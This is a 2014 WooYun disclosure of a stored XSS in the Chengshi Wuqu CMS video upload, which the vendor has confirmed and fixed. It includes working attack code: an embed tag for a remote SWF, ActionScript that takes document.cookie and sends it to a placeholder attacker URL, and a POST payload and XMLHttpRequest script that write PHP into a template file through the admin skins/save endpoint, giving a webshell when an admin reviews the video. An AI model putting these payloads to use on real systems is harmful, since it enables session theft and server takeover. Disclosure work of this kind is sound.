当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-063816

漏洞标题:程氏舞曲CMS储存型 xss(5)

相关厂商:chshcms.com

漏洞作者: roker

提交时间:2014-06-09 17:04

修复时间:2014-09-07 17:06

公开时间:2014-09-07 17:06

漏洞类型:xss跨站脚本攻击

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-06-09: 细节已通知厂商并且等待厂商处理中
2014-06-09: 厂商已经确认,细节仅向厂商公开
2014-06-12: 细节向第三方安全合作伙伴开放
2014-08-03: 细节向核心白帽子及相关领域专家公开
2014-08-13: 细节向普通白帽子公开
2014-08-23: 细节向实习白帽子公开
2014-09-07: 细节向公众公开

简要描述:

rt,swf啊。。

详细说明:

上传视频处 。对于外部swf文件 过分信任

c1.jpg

可插入 如下代码
<embed src=http://xxx.xxx/xss.swf type="application/x-shockwave-flash" allowfullscreen="true" allownetworking="all" allowscriptaccess="always">
构造 恶意的 swf 执行 js
像这样 alert

c2.jpg

c3.jpg


这是 获取cookie的swf代码

package {
	import flash.external.ExternalInterface;
	import flash.display.Sprite;
	import flash.display.Sprite;
    import flash.events.Event;
    import flash.net.URLLoader;
    import flash.net.URLRequest;
    import flash.text.TextField;
    import flash.text.TextFieldAutoSize;
    import flash.xml.*;
    import flash.events.IOErrorEvent;
	import flash.events.*;
    import flash.net.*;
	/**
	 * @author User
	 */
	
 	public class csrf extends Sprite {
        
        private var loader:URLLoader;
        public function csrf() {
			var res:String = ExternalInterface.call("function(){return document.cookie;}");
            doGet(res);
        }
		
		private function doGet(res:String):void{
			loader = new URLLoader();
			var target:String = "http://xxx/xxx.php?get="+res;
            var request:URLRequest = new URLRequest(target);
            try {
                loader.load(request);
            } catch (error:Error) {
                sendDatatoJS("Error: " + error.getStackTrace());
            }
		}
		
		private function sendDatatoJS(data:String):void{
            trace(data);
			ExternalInterface.call("console.log", data);
		}
    }
	
	
}


后台可以getshell
http://localhost/index.php/admin/skins/save
post如下数据 

path=.%2Fskins%2Findex%2Fdefault%2Fhtml%2Fcs-404.php&CS_Name=cs-404&CS_Neir=<?php phpinfo();?>&Submit=+%E4%BF%AE%E6%94%B9+


getshell

c4.jpg


我们 可以 swf加载个 远程js
js代码为

var request = false; if(window.XMLHttpRequest) { request = new XMLHttpRequest(); if(request.overrideMimeType) { request.overrideMimeType('text/xml'); } } else if (window.ActiveXObject) { var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP']; for(var i=0; i<versions.length; i++) { try { request = new ActiveXObject(versions); } catch(e) {} } } xmlhttp=request; url = "http://xxx.com/index.php/admin/skins/save"; var params ='path=.%2Fskins%2Findex%2Fdefault%2Fhtml%2Fcs-404.php&CS_Name=cs-404&CS_Neir=<?php phpinfo();?>&Submit=+%E4%BF%AE%E6%94%B9+'; xmlhttp.open("POST", url, true); xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); xmlhttp.setRequestHeader("Content-length", params.length); xmlhttp.setRequestHeader("Connection", "Keep-Alive"); xmlhttp.setRequestHeader("Accept", "text/html,application/xhtm+xml,application/xml;q=0.9,*/*;q=0.8"); xmlhttp.withCredentials = "true"; xmlhttp.send(params);


cors是可以跨域传输数据的。从而 后台审核视频文章时 getshell

漏洞证明:

如上所述

修复方案:

过滤 allowfullscreen="true" allownetworking="all" allowscriptaccess="always"

版权声明:转载请注明来源 roker@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2014-06-09 18:51

厂商回复:

检查 漏洞确实存在,
我们会立即修复~!
感谢您的检测~!

最新状态:

2014-06-10:已经修复~!

漏洞评价:

评论

  1. 2014-06-29 23:08 | zj1244 ( 普通白帽子 | Rank:273 漏洞数:33 | 小葵)

    cors要求目标域设置Access-Control-Allow-Origin,你这样跨域不成功吧?

  2. 2014-06-30 03:12 | roker ( 普通白帽子 | Rank:357 漏洞数:108 )

    @zj1244 余弦大牛的 web前端黑客技术揭秘 一书中 2.5.2 ajax风险 中 写到“如果目标域不设置Access-Control-Allow-Origin: http://www.foo.com,那么隐私数据可以被偷到吗?答案是肯定的。虽然浏览器会报权限错误的问题,但实际上隐私数据已经被目标域的steal.php接收到了。默认情况下,这样的跨域无法带上目标域的会话(Cookies等),需要设置xhr实例的withCredentials属性为true(IE还不支持),。。。。。”更深成次的原理我也不懂,但是 实测是可行的。目标域可以接受数据。你可以自己测试下0.0..可以的话加个秋秋,求交流,求学习,求搞基~

  3. 2014-06-30 09:47 | zj1244 ( 普通白帽子 | Rank:273 漏洞数:33 | 小葵)

    @roker 差点忘了这茬了,那时候我测试觉得挺奇怪的,目标域不设置Access-Control-Allow-Origin,用普通的ajax都可以提交数据成功。扣扣43416783,一起学习